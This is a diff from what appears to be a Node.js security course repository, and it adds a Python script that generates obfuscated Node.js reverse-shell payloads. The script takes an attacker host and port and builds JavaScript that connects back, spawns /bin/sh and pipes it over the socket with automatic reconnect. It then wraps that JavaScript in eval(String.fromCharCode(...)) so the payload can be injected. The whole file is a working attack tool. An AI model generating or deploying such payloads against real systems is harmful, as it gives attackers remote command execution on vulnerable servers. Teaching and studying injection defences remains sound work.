https://github.com/0xwindows/Node.Js-Security-Course/blob/master/node…

…jsshell.py

app/nodejsshell.py

@@ -0,0 +1,53 @@
+#!/usr/bin/python
+# Generator for encoded NodeJS reverse shells
+# Based on the NodeJS reverse shell by Evilpacket
+# https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
+# Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)
+# Insecurety Research (2013) - insecurety.net
+import sys
+
+if len(sys.argv) != 3:
+    print "Usage: %s <LHOST> <LPORT>" % (sys.argv[0])
+    sys.exit(0)
+
+IP_ADDR = sys.argv[1]
+PORT = sys.argv[2]
+
+
+def charencode(string):
+    """String.CharCode"""
+    encoded = ''
+    for char in string:
+        encoded = encoded + "," + str(ord(char))
+    return encoded[1:]
+
+print "[+] LHOST = %s" % (IP_ADDR)
+print "[+] LPORT = %s" % (PORT)
+NODEJS_REV_SHELL = '''
+var net = require('net');
+var spawn = require('child_process').spawn;
+HOST="%s";
+PORT="%s";
+TIMEOUT="5000";
+if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
+function c(HOST,PORT) {
+    var client = new net.Socket();
+    client.connect(PORT, HOST, function() {
+        var sh = spawn('/bin/sh',[]);
+        client.write("Connected!\\n");
+        client.pipe(sh.stdin);
+        sh.stdout.pipe(client);
+        sh.stderr.pipe(client);
+        sh.on('exit',function(code,signal){
+          client.end("Disconnected!\\n");
+        });
+    });
+    client.on('error', function(e) {
+        setTimeout(c(HOST,PORT), TIMEOUT);
+    });
+}
+c(HOST,PORT);
+''' % (IP_ADDR, PORT)
+print "[+] Encoding"
+PAYLOAD = charencode(NODEJS_REV_SHELL)
+print "eval(String.fromCharCode(%s))" % (PAYLOAD)